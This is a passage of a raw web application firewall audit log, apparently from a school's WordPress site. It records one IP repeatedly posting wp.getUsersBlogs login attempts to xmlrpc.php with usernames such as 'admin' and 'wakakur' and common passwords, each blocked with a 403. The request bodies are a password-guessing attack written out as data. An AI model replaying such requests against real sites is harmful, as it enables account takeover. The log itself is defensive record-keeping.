charset=iso-8859-1 --2c18053e-E-- --2c18053e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (103+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283827297830 5851 (- - -) Stopwatch2: 1749283827297830 5851; combined=4218, p1=480, p2=3403, p3=0, p4=0, p5=215, sr=85, sw=120, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c18053e-Z-- --29febd53-A-- [07/Jun/2025:15:11:30 +0700] aEP0MhK9gc79coX6mHR_1QAAAEI 103.236.140.4 53294 103.236.140.4 8181 --29febd53-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --29febd53-C-- wp.getUsersBlogs admin 123456zx --29febd53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29febd53-E-- --29febd53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283890244807 5392 (- - -) Stopwatch2: 1749283890244807 5392; combined=3880, p1=480, p2=3209, p3=0, p4=0, p5=112, sr=94, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29febd53-Z-- --be67997b-A-- [07/Jun/2025:15:11:49 +0700] aEP0RRK9gc79coX6mHSACAAAAFQ 103.236.140.4 53824 103.236.140.4 8181 --be67997b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --be67997b-C-- wp.getUsersBlogs admin 1234%^&* --be67997b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be67997b-E-- --be67997b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283909476311 4607 (- - -) Stopwatch2: 1749283909476311 4607; combined=3521, p1=447, p2=2911, p3=0, p4=0, p5=99, sr=84, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be67997b-Z-- --174d862b-A-- [07/Jun/2025:15:12:31 +0700] aEP0b2COO9DrcKL2J_7vPgAAAMw 103.236.140.4 55120 103.236.140.4 8181 --174d862b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --174d862b-C-- wp.getUsersBlogs admin master --174d862b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --174d862b-E-- --174d862b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749283951844361 5528 (- - -) Stopwatch2: 1749283951844361 5528; combined=3988, p1=467, p2=3347, p3=0, p4=0, p5=102, sr=92, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --174d862b-Z-- --cbb2a702-A-- [07/Jun/2025:15:13:31 +0700] aEP0q_ClubEPOra_8Un_ZQAAAAU 103.236.140.4 57068 103.236.140.4 8181 --cbb2a702-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cbb2a702-C-- wp.getUsersBlogs admin elizabeth --cbb2a702-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbb2a702-E-- --cbb2a702-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284011643373 4953 (- - -) Stopwatch2: 1749284011643373 4953; combined=3855, p1=444, p2=3230, p3=0, p4=0, p5=106, sr=84, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbb2a702-Z-- --ad844b0d-A-- [07/Jun/2025:15:14:32 +0700] aEP06GCOO9DrcKL2J_7wMgAAAM4 103.236.140.4 58964 103.236.140.4 8181 --ad844b0d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ad844b0d-C-- wp.getUsersBlogs wakakur 123 --ad844b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad844b0d-E-- --ad844b0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (95+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284072655710 5580 (- - -) Stopwatch2: 1749284072655710 5580; combined=3900, p1=471, p2=3229, p3=0, p4=0, p5=114, sr=90, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad844b0d-Z-- --28885127-A-- [07/Jun/2025:15:15:32 +0700] aEP1JJANhDjQAvBdMyHScAAAAJY 103.236.140.4 60662 103.236.140.4 8181 --28885127-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --28885127-C-- wp.getUsersBlogs wakakur 12344321 --28885127-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28885127-E-- --28885127-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (104+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284132273038 5535 (- - -) Stopwatch2: 1749284132273038 5535; combined=4112, p1=519, p2=3382, p3=0, p4=0, p5=122, sr=88, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28885127-Z-- --244e4000-A-- [07/Jun/2025:15:16:32 +0700] aEP1YJANhDjQAvBdMyHTEwAAAIo 103.236.140.4 34098 103.236.140.4 8181 --244e4000-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --244e4000-C-- wp.getUsersBlogs wakakur scooter --244e4000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --244e4000-E-- --244e4000-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284192570248 5475 (- - -) Stopwatch2: 1749284192570248 5475; combined=3891, p1=461, p2=3199, p3=0, p4=0, p5=143, sr=89, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --244e4000-Z-- --3c97b139-A-- [07/Jun/2025:15:17:32 +0700] aEP1nBK9gc79coX6mHSDegAAAFE 103.236.140.4 35852 103.236.140.4 8181 --3c97b139-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3c97b139-C-- wp.getUsersBlogs wakakur poohbear --3c97b139-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c97b139-E-- --3c97b139-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (99+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284252546881 5326 (- - -) Stopwatch2: 1749284252546881 5326; combined=4035, p1=518, p2=3269, p3=0, p4=0, p5=146, sr=88, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c97b139-Z-- --0f1f5c38-A-- [07/Jun/2025:15:18:32 +0700] aEP12BK9gc79coX6mHSD7wAAAEA 103.236.140.4 37582 103.236.140.4 8181 --0f1f5c38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0f1f5c38-C-- wp.getUsersBlogs wakakur marketing2022 --0f1f5c38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f1f5c38-E-- --0f1f5c38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284312251302 5391 (- - -) Stopwatch2: 1749284312251302 5391; combined=3837, p1=468, p2=3188, p3=0, p4=0, p5=106, sr=90, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f1f5c38-Z-- --f776a35b-A-- [07/Jun/2025:15:19:32 +0700] aEP2FPClubEPOra_8UkB-gAAABE 103.236.140.4 39524 103.236.140.4 8181 --f776a35b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f776a35b-C-- wp.getUsersBlogs wakakur celtic1888 --f776a35b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f776a35b-E-- --f776a35b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284372756753 5163 (- - -) Stopwatch2: 1749284372756753 5163; combined=4130, p1=500, p2=3452, p3=0, p4=0, p5=105, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f776a35b-Z-- --9803bc0b-A-- [07/Jun/2025:15:20:32 +0700] aEP2UPClubEPOra_8UkCggAAABU 103.236.140.4 41494 103.236.140.4 8181 --9803bc0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9803bc0b-C-- wp.getUsersBlogs wakakur superadmin --9803bc0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9803bc0b-E-- --9803bc0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284432041225 5368 (- - -) Stopwatch2: 1749284432041225 5368; combined=3930, p1=490, p2=3143, p3=0, p4=0, p5=163, sr=85, sw=134, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9803bc0b-Z-- --521adc75-A-- [07/Jun/2025:15:21:32 +0700] aEP2jGCOO9DrcKL2J_7zRgAAAMc 103.236.140.4 43610 103.236.140.4 8181 --521adc75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --521adc75-C-- wp.getUsersBlogs wakakur 852654 --521adc75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --521adc75-E-- --521adc75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (109+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284492013171 6098 (- - -) Stopwatch2: 1749284492013171 6098; combined=4212, p1=522, p2=3515, p3=0, p4=0, p5=103, sr=98, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --521adc75-Z-- --b5dab400-A-- [07/Jun/2025:15:22:33 +0700] aEP2yZANhDjQAvBdMyHVfQAAAJQ 103.236.140.4 45862 103.236.140.4 8181 --b5dab400-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b5dab400-C-- wp.getUsersBlogs wakakur a123 --b5dab400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5dab400-E-- --b5dab400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284553430513 4824 (- - -) Stopwatch2: 1749284553430513 4824; combined=3429, p1=420, p2=2844, p3=0, p4=0, p5=96, sr=76, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5dab400-Z-- --d521d84f-A-- [07/Jun/2025:15:23:12 +0700] aEP28BK9gc79coX6mHSGyAAAAEM 103.236.140.4 47278 103.236.140.4 8181 --d521d84f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d521d84f-C-- wp.getUsersBlogs wakakur 1234%^&* --d521d84f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d521d84f-E-- --d521d84f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284592479394 5297 (- - -) Stopwatch2: 1749284592479394 5297; combined=4187, p1=481, p2=3515, p3=0, p4=0, p5=118, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d521d84f-Z-- --b97cb701-A-- [07/Jun/2025:15:23:34 +0700] aEP3BpANhDjQAvBdMyHWBgAAAJY 103.236.140.4 48040 103.236.140.4 8181 --b97cb701-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b97cb701-C-- wp.getUsersBlogs wakakur administrator1234 --b97cb701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b97cb701-E-- --b97cb701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749284614341807 5972 (- - -) Stopwatch2: 1749284614341807 5972; combined=4106, p1=530, p2=3399, p3=0, p4=0, p5=105, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b97cb701-Z-- --5acec148-A-- [07/Jun/2025:15:24:35 +0700] aEP3Q_ClubEPOra_8UkFWgAAAAA 